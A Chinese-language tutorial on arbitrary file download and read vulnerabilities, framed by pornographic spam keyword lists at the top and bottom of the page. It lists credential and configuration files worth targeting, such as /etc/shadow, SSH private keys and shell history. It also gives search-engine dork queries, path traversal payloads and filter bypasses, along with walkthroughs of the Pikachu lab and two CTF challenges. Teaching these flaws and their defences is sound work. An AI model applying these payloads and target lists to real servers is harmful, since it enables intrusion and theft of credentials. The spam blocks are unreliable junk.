婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 案例講解WEB 漏洞-文件操作之文件下載讀取

案例講解WEB 漏洞-文件操作之文件下載讀取

熱門標簽:不同的地圖標注 激戰黃昏地圖標注說明 交行外呼系統有哪些 防城港市ai電銷機器人 怎么更改地圖標注電話 寧夏保險智能外呼系統哪家好 溫嶺代理外呼系統 臨滄移動外呼系統哪家有 隨州銷售外呼系統平臺

原理

產生:任意語言代碼下載函數
文件下載(一些網站由于業務需求,往往需要提供文件查看或文件下載功能,但若對用戶查看或下載的文件不做限制,則惡意用戶就能夠查看或下載任意敏感文件,這就是文件查看與下載漏洞。)

文件下載功能在很多web系統上都會出現,一般我們當點擊下載鏈接,便會向后臺發送一個下載請求,一般這個請求會包含一個需要下載的文件名稱,后臺在收到請求后 會開始執行下載代碼,將該文件名對應的文件response給瀏覽器,從而完成下載。 如果后臺在收到請求的文件名后,將其直接拼進下載文件的路徑中而不對其進行安全判斷的話,則可能會引發不安全的文件下載漏洞。此時如果 攻擊者提交的不是一個程序預期的的文件名,而是一個精心構造的路徑(比如../../../etc/passwd),則很有可能會直接將該指定的文件下載下來。 從而導致后臺敏感信息(密碼文件、源代碼等)被下載。
所以,在設計文件下載功能時,如果下載的目標文件是由前端傳進來的,則一定要對傳進來的文件進行安全考慮。

漏洞危害

下載服務器任意文件,如腳本代碼、服務及系統配置文件等
可用得到的代碼進一步代碼審計,得到更多可利用漏洞

利用方式

淺談任意文件下載漏洞的利用
信息收集信息→猜路徑→下載配置文件/代碼文件→利用服務器軟件漏洞→shell→提權

首先收集系統信息,包括系統版本,中間件,cms版本,服務器用途,服務器使用者信息,端口,web路徑等,然后根據收集到的信息,下載配置文件,如weblogic,ftp,ssh等, 根據下載到的配置文件進行滲透。

1. 讀取程序源代碼(如密碼配置文件)
2. 讀取程序配置文件(如數據庫連接文件)
如weblogic,ssh,ftp,數據庫配置文件等, 當解出密碼后,進行登陸,getshell
3. 讀取操作系統關鍵文件(如/etc/sadow,/ root/.bash_history等文件)
4. 讀取運維配置文件(redis/rsync/ftp/ssh客 戶端數據等)
5. 讀取中間件配置文件(weblogic/tomcat等 密碼文件,apache的httpd.conf文件)
6. 下載web日志文件(獲取網站后臺/上傳文件 等)
 下載日志文件,找到登錄/上傳/后臺/ 操作,找到登錄入口 可以爆破,測試默認口令,弱口令,  找到文件上傳點則測試文件上傳漏洞,找到后臺操作試試有沒有未授權訪問
7. 結合SSRF獲取內網機器文件
8. 可以利用../返回到上級目錄下載敏感文件

系統文件

window

C:\boot.ini //查看系統版本
C:\Windows\System32\inetsrv\MetaBase. xml //IIS配置文件
C:\Windows\repair\sam //存儲系統初次安裝的密碼
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user. MYD  //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息

Linux

.bash_history` # 歷史中可能帶著用戶的密碼 ( 遇到過現實案例,是輸錯的情況下參數的,比如沒 輸入 su 卻以為自己輸了 su)
/etc/passwd # 用戶情況
/etc/shadow # 直接 John the Ripper
/etc/hosts # 主機信息,通常配置了一些內網 域名
/root/.bash_history //root的bash歷史記錄
/root/.ssh/authorized_keys /root/.mysql_history //mysql的bash歷史記錄
/root/.wget-hsts /opt/nginx/conf/nginx.conf //nginx的配置文件
/var/www/html/index.html /etc/my.cnf /etc/httpd/conf/httpd.conf //httpd的配置文件
/proc/self/fd/fd[0-9]*(文件標識符)
/proc/mounts /porc/config.gz /proc/sched_debug // 提供cpu上正在運行的進程信息,可以獲得進程的pid號,可以配合后面需要pid的利用
/proc/mounts // 掛載的文件系統列表
/proc/net/arp //arp表,可以獲得內網其他機器的地址
/proc/net/route //路由表信息
/proc/net/tcp and /proc/net/udp // 活動連接的信息
/proc/net/fib_trie // 路由緩存
/proc/version // 內核版本
/proc/[PID]/cmdline // 可能包含有用的路徑信息
/proc/[PID]/environ // 程序運行的環境變量信息,可以用來包含getshell
/proc/[PID]/cwd // 當前進程的工作目錄
/proc/[PID]/fd/[#] // 訪問file descriptors, 某寫情況可以讀取到進程正在使用的文件,比如 access.log /root/.ssh/id_rsa /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys /etc/ssh/sshd_config /var/log/secure /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/syscomfig/network-scripts/ifcfg-eth1
/usr/local/tomcat/conf/tomcat-users. xml # tomcat 用戶配置文件
/root/.bashrc # 環境變量
/root/.bash_history # 還有root外的其他用戶
/root/.viminfo # vim 信息
/root/.ssh/id_rsa # 拿私鑰直接ssh
/proc/xxxx/cmdline # 進程狀態枚舉 xxxx 可以為0000-9999 使用burpsuite 數據庫 config 文件     web 日志 access.log, error.log /var/lib/php/sess_PHPSESSID # 非常規問題 session 文件
/proc/net/arp /proc/net/tcp /proc/net/udp /proc/net/dev

常見腳本敏感文件參考

PHP: inc/config. php獲得數據庫連接字符串中的口令信息
asp: inc/conn.asp文件,獲得數據庫連接字符串,得到數據庫口令。
aspx: web.config網站根目錄文件,獲得數據庫連接信息。
JSP: conf/ tomcat-user.xml文件,獲得tomcat管理界面的口令信息
WEB- INF /Web. xml文件,獲得數據庫連接字符串中的口令信息。

任意文件讀取

?php
    $filename = "test.txt";
    readfile($filename);
?>

?php
    $filename = "test.txt";
    $fp = fopen($filename,"r") or die("Unable to open file!");
    $data = fread($fp,filesize($filename));
    fclose($fp);
    echo $data;
?>

?php
    $filename = "test.txt";
    echo file_get_contents($filename);
?>

任意文件下載

直接下載:

a  rel="external nofollow" >Download/a>

用header()下載:

?php
    $filename = "uploads/201607141437284653.jpg";
    header('Content-Type: imgage/jpeg');
    header('Content-Disposition: attachment; filename='.$filename);
    header('Content-Lengh: '.filesize($filename));
?>

Google search

inurl:"readfile.php?file="
inurl:"read.php?filename="
inurl:"download.php?file="
inurl:"down.php?file="
等等...

漏洞利用代碼

readfile.php?file=/etc/passwd
readfile.php?file=../../../../../../../../etc/passwd
readfile.php?file=../../../../../../../../etc/passwd%00

1.文件被解析,則是文件包含漏洞
2.顯示源代碼,則是文件讀取漏洞
3.提示文件下載,則是文件下載漏洞

漏洞挖掘

可以用Google hacking或Web漏洞掃描器
從鏈接上看,形如:
    • readfile.php?file=***.txt
    • download.php?file=***.rar
從參數名看,形如:
    • RealPath= 
    • FilePath= 
    • filepath= 
    • Path= 
    • path= 
    • inputFile= 
    • url= 
    • urls= 
    • Lang= 
    • dis= 
    • data= 
    • readfile= 
    • filep= 
    • src= 
    • menu= 
    • META-INF 
    • WEB-INF
目錄符號等
../ ..\ .\ ./等
%00 ? %23 %20 .等

漏洞驗證

• index.php?f=../../../../../../etc/passwd 
• index.php?f=../index.php 
• index.php?f=file:///etc/passwd
注:當參數f的參數值為php文件時,若是文件被解析則是文件包含漏洞,
    若顯示源碼或提示下載則是文件查看與下載漏洞

漏洞防范

任意文件下載漏洞的簡單防護措施
1、過濾“.”符號,使用戶在url中無法回溯到上級目錄。
2、使用正則表達式嚴格判斷用戶輸入參數的格式。
3、php.ini配置文件中對于open_basedir進行配置,限定用戶的文件訪問范圍。
4、固定目錄

案例

pikuchu靶場-文件下載測試

1、判斷是否為文件上傳漏洞


點擊任意圖片,發現下載了圖片,復制圖片下載鏈接查看

http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=kb.png

查看參數名為filename,查看參數后面的值也與下載的文件名一樣
初步判定為文件上傳漏洞

2、判斷下載路徑
filename的文件名是單純的文件名,可判斷是前面加了路徑名,也可能是與網站在同一個目錄下
通過URL判斷文件是通過跳轉到execdownload.php頁面下載的,我們試試看可不可以直接下載到execdownload.php這個源碼

http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=execdownload.php

發現顯示無法下載,說明該execdownload.php與文件不在同一個路徑下,我們嘗試下到上一級路徑

http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=../execdownload.php


成功下載,打開源碼發現是在download文件夾下


說明文件下載路徑的文件夾與down_nba.php是同一級路徑
3、嘗試下載敏感文件(以下路徑均通過掃描路徑得到)
pikachu-master/inc/config.inc.php
當前下載路徑:
pikachu-master/vul/unsafedownload/download/xxx.xxx
與vul相差3個父目錄,所以加3個…/
完整url:
http://127.0.0.1/xscj/pikachu-master/vul/unsafedownload/execdownload.php?filename=…/…/…/inc/config.inc.php
下載成功,打開發現里面存在數據庫相關的配置文件

小米路由器-文件讀取真實測試-漏洞

復現

RoarCTF2019-文件讀取真題復現

wp
首先看到一個頁面,點擊下help看看啥情況。

發現輸出一串

java.io.FileNotFoundException:{help.docx}

是文件無法找到的異常信息

查詢資料發現:
WEB-INF/web.xml泄露
WEB-INF是Java的WEB應用的安全目錄。如果想在頁面中直接訪問其中的文件,必須通過web.xml文件對要訪問的文件進行相應映射才能訪問。WEB-INF主要包含一下文件或目錄:
/WEB-INF/web.xml:Web應用程序配置文件,描述了 servlet 和其他的應用組件配置及命名規則。
/WEB-INF/classes/:含了站點所有用的 class 文件,包括 servlet class 和非servlet class,他們不能包含在 .jar文件中
/WEB-INF/lib/:存放web應用需要的各種JAR文件,放置僅在這個應用中要求使用的jar文件,如數據庫驅動jar文件
/WEB-INF/src/:源碼目錄,按照包名結構放置各個java文件。
/WEB-INF/database.properties:數據庫配置文件

漏洞成因:
通常一些web應用我們會使用多個web服務器搭配使用,解決其中的一個web服務器的性能缺陷以及做均衡負載的優點和完成一些分層結構的安全策略等。在使用這種架構的時候,由于對靜態資源的目錄或文件的映射配置不當,可能會引發一些的安全問題,導致web.xml等文件能夠被讀取。漏洞檢測以及利用方法:通過找到web.xml文件,推斷class文件的路徑,最后直接class文件,在通過反編譯class文件,得到網站源碼。一般情況,jsp引擎默認都是禁止訪問WEB-INF目錄的,Nginx 配合Tomcat做均衡負載或集群等情況時,問題原因其實很簡單,Nginx不會去考慮配置其他類型引擎(Nginx不是jsp引擎)導致的安全問題而引入到自身的安全規范中來(這樣耦合性太高了),修改Nginx配置文件禁止訪問WEB-INF目錄就好了: location ~ ^/WEB-INF/* { deny all; } 或者return 404; 或者其他!

根據上文,我們先找一下WEB-INF/web.xml,POST傳值

得到WEB-INF/web.xml文件,打開

?xml version="1.0" encoding="UTF-8"?>
web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">

    welcome-file-list>
        welcome-file>Index/welcome-file>
    /welcome-file-list>

    servlet>
        servlet-name>IndexController/servlet-name>
        servlet-class>com.wm.ctf.IndexController/servlet-class>
    /servlet>
    servlet-mapping>
        servlet-name>IndexController/servlet-name>
        url-pattern>/Index/url-pattern>
    /servlet-mapping>

    servlet>
        servlet-name>LoginController/servlet-name>
        servlet-class>com.wm.ctf.LoginController/servlet-class>
    /servlet>
    servlet-mapping>
        servlet-name>LoginController/servlet-name>
        url-pattern>/Login/url-pattern>
    /servlet-mapping>

    servlet>
        servlet-name>DownloadController/servlet-name>
        servlet-class>com.wm.ctf.DownloadController/servlet-class>
    /servlet>
    servlet-mapping>
        servlet-name>DownloadController/servlet-name>
        url-pattern>/Download/url-pattern>
    /servlet-mapping>

    servlet>
        servlet-name>FlagController/servlet-name>
        servlet-class>com.wm.ctf.FlagController/servlet-class>
    /servlet>
    servlet-mapping>
        servlet-name>FlagController/servlet-name>
        url-pattern>/Flag/url-pattern>
    /servlet-mapping>

/web-app>

我們可以看到com.wm.FlagController,

    servlet>
        servlet-name>FlagController/servlet-name>
        servlet-class>com.wm.ctf.FlagController/servlet-class>
    /servlet>

servlet-class里面的.代表的是路徑/
然后下載FlagController.class文件試一試

filename=WEB-INF/classes/com/wm/ctf/FlagController.class

打開文件發現一串base編碼,進行base64解密得到flag


資料1
資料2

百度杯2017二月-Zone真題復現

靶場
wp1
wp2

1、 嘗試burp抓包發現cookie中有個login,值為0,將0改為1后在訪問首頁,發現可以正常登入


2、單擊 “manage” (此時還是需要用burp改login的值),點擊框框發現比較特殊的url;猜測可能存在文件包含或者下載、讀取

3、測試訪問url: xxxxxx.com/manages/admin.php?module=ind…/exname=php 頁面可以正常訪問,猜測過濾了一遍…/再試一試繞過 url:url: xxxxxx.com/manages/admin.php?module=ind…/./exname=php 訪問不正常;
說明過濾機制只是把…/進行了一次過濾,所以我們雙寫…/即可

4、訪問測試任意文件讀取判斷路徑通過不斷加…/ url:?module=…/./…/./…/./etc/passwdname
(用戶情況文件)

5、查看下服務器是nginx。找一下它的配置文件,根據信息讀取配置文件, url: manages/admin.php?module=…/./…/./…/./etc/nginx/nginx.conf 獲得關鍵文件sites-enabled/default 并進行讀取


module=…/./…/./…/./etc/nginx/sites-enabled/defaultname=獲得web文件路徑online-movies 并訪問


6、發現可以利用的漏洞,因為有一個autoindex on也就是開啟了目錄遍歷,我們可以訪問這個/online-movies/,訪問出現如下,再點擊…/發現要進行驗證,把login改為1后頁面空白,我通過百度發現要/online-movies/…才能遍歷(不清楚為什么)


7、訪問/online-movies…/

8、地址為:online-movies…/var/www/html/flag.php構造url下載到flag.php獲得flag

到此這篇關于案例講解WEB 漏洞-文件操作之文件下載讀取的文章就介紹到這了,更多相關WEB 漏洞文件下載讀取內容請搜索腳本之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持腳本之家!

您可能感興趣的文章:
  • Python腳本實現Web漏洞掃描工具

標簽:阜陽 河源 紅河 哈密 忻州 青海 沈陽 無錫

巨人網絡通訊聲明:本文標題《案例講解WEB 漏洞-文件操作之文件下載讀取》,本文關鍵詞  案例,講解,WEB,漏洞,文件,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《案例講解WEB 漏洞-文件操作之文件下載讀取》相關的同類信息!
  • 本頁收集關于案例講解WEB 漏洞-文件操作之文件下載讀取的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    亚洲电影在线播放| 午夜久久久影院| 一区二区三区久久| 91高清视频免费看| 日韩视频在线永久播放| 91在线国内视频| 欧美大度的电影原声| 波多野结衣亚洲一区| 国产精品青草久久| youjizz久久| 亚洲精品视频自拍| 日韩黄色一级片| 亚洲综合色视频| 欧美r级电影在线观看| 国产91丝袜在线播放九色| 午夜精品一区二区三区免费视频| 日本道精品一区二区三区| 亚洲美女免费视频| 欧美日韩精品欧美日韩精品| 日韩色在线观看| 色婷婷综合久色| 亚洲精品久久久蜜桃| 国产白丝精品91爽爽久久| 亚洲图片欧美综合| 日韩午夜电影在线观看| 亚洲成人激情av| 亚洲精品国产视频| 亚洲精品欧美激情| 国产精品国产三级国产普通话三级 | 欧美一区二区在线播放| 麻豆成人在线观看| 自拍偷自拍亚洲精品播放| 一区二区不卡在线播放| 国产精品视频第一区| 国产日韩三级在线| 国产精品理论片在线观看| 4438亚洲最大| 久久综合久久久久88| 精品福利一二区| 奇米色一区二区| 男男视频亚洲欧美| 日韩无一区二区| 麻豆freexxxx性91精品| 日韩午夜中文字幕| 久久久精品免费观看| 一区二区三区在线视频免费观看| 丝袜美腿一区二区三区| 国产传媒一区在线| 91精品国产乱码久久蜜臀| 一区二区在线观看免费视频播放| 久久精品国产免费| 欧美性猛交一区二区三区精品| 精品国产乱码久久久久久浪潮| 亚洲蜜臀av乱码久久精品 | 欧美肥妇毛茸茸| 自拍视频在线观看一区二区| 精久久久久久久久久久| 欧美精品在线观看播放| 亚洲成在人线免费| 欧美人xxxx| 天堂蜜桃一区二区三区| 精品婷婷伊人一区三区三| 亚洲裸体xxx| 97国产一区二区| 亚洲精品国产a| 欧美日韩成人一区| 奇米888四色在线精品| 美女视频一区二区三区| 舔着乳尖日韩一区| 暴力调教一区二区三区| 色婷婷av一区二区三区软件 | 成人黄色一级视频| 日韩中文字幕一区二区三区| 欧美主播一区二区三区| 99亚偷拍自图区亚洲| 亚洲欧美日韩国产综合在线 | 国产一区 二区| 日韩精品视频网| 欧美日韩一区二区三区不卡| 国产精品2024| 青青草伊人久久| 91在线免费播放| 日本不卡123| 亚洲精品免费视频| 国产精品毛片高清在线完整版 | 日韩精品午夜视频| 亚洲黄色录像片| 国产精品毛片大码女人| 国产亚洲成aⅴ人片在线观看| 日韩区在线观看| 欧美色区777第一页| 一本大道久久a久久精品综合| 一区二区三区在线观看国产| 久久精品欧美一区二区三区麻豆| 欧美剧情电影在线观看完整版免费励志电影 | 日韩美女视频19| 91精彩视频在线观看| 99久久99久久精品免费观看| 国产精品99精品久久免费| 精品一区二区三区免费观看 | 成人一级视频在线观看| 国v精品久久久网| 成人做爰69片免费看网站| 性做久久久久久免费观看欧美| 日韩精品欧美精品| 国产传媒日韩欧美成人| 欧美日韩美女一区二区| 亚洲成人久久影院| 欧美视频完全免费看| 欧美日韩黄视频| 午夜久久久久久久久| 国产精品麻豆网站| 国产综合一区二区| 国产欧美一区二区精品性 | 波多野结衣亚洲| 白白色 亚洲乱淫| 欧美日韩三级在线| 久久婷婷一区二区三区| 中日韩av电影| 日韩美女一区二区三区四区| 欧美电视剧在线观看完整版| 精品一区二区三区欧美| 91久久国产综合久久| 国产成人综合亚洲网站| 91亚洲精品乱码久久久久久蜜桃| 成人网男人的天堂| 欧美亚洲一区二区在线观看| 欧美电影影音先锋| 国产日韩精品一区二区浪潮av| 国产精品国产精品国产专区不片| 日韩毛片在线免费观看| 一区二区三区在线播| 91色在线porny| 国产激情一区二区三区桃花岛亚洲 | 日韩欧美一区二区视频| 久久激情五月激情| 国产精品一区二区三区四区| 色欧美88888久久久久久影院| 91精品福利在线| 成人免费视频网站在线观看| 91婷婷韩国欧美一区二区| 黄一区二区三区| 青娱乐精品在线视频| 欧美日韩一区二区在线视频| 国产精品女同一区二区三区| 日韩一区二区麻豆国产| 精品国内二区三区| 亚洲国产高清在线| 日本一区二区不卡视频| 欧美精品18+| youjizz国产精品| 欧洲精品一区二区三区在线观看| 美女视频网站久久| 欧美一区二区三区免费观看视频| 黄色小说综合网站| 紧缚捆绑精品一区二区| 婷婷六月综合网| 亚洲日穴在线视频| 亚洲色图自拍偷拍美腿丝袜制服诱惑麻豆 | www.亚洲免费av| 亚洲国产视频一区| 中文字幕在线一区二区三区| 精品三级av在线| 国产精品伦一区二区三级视频| 国产性做久久久久久| 国产亚洲精品资源在线26u| 亚洲六月丁香色婷婷综合久久| 国产精品乱人伦| 中文字幕精品在线不卡| 亚洲精品国产精品乱码不99| 精品一区二区三区免费播放| 国产91在线观看| 国产三级精品三级在线专区| 国产精品久久久久一区| 日韩视频在线永久播放| 久久精品视频一区二区| 亚洲狼人国产精品| 一区二区三区在线看| 亚洲午夜在线观看视频在线| 国产人伦精品一区二区| 国产精品国模大尺度视频| 日本欧美大码aⅴ在线播放| 久久97超碰色| 国产自产v一区二区三区c| 国产成人精品亚洲日本在线桃色 | 免费久久精品视频| 国产一本一道久久香蕉| 色婷婷香蕉在线一区二区| 日本午夜精品一区二区三区电影| 麻豆成人综合网| 色婷婷精品大在线视频| 亚洲免费观看高清完整版在线观看熊 | 91在线视频观看| 欧美高清你懂得| 亚洲一区在线观看免费观看电影高清 | 欧美剧在线免费观看网站| 亚洲欧洲三级电影| 菠萝蜜视频在线观看一区| 久久在线免费观看| 视频在线观看国产精品|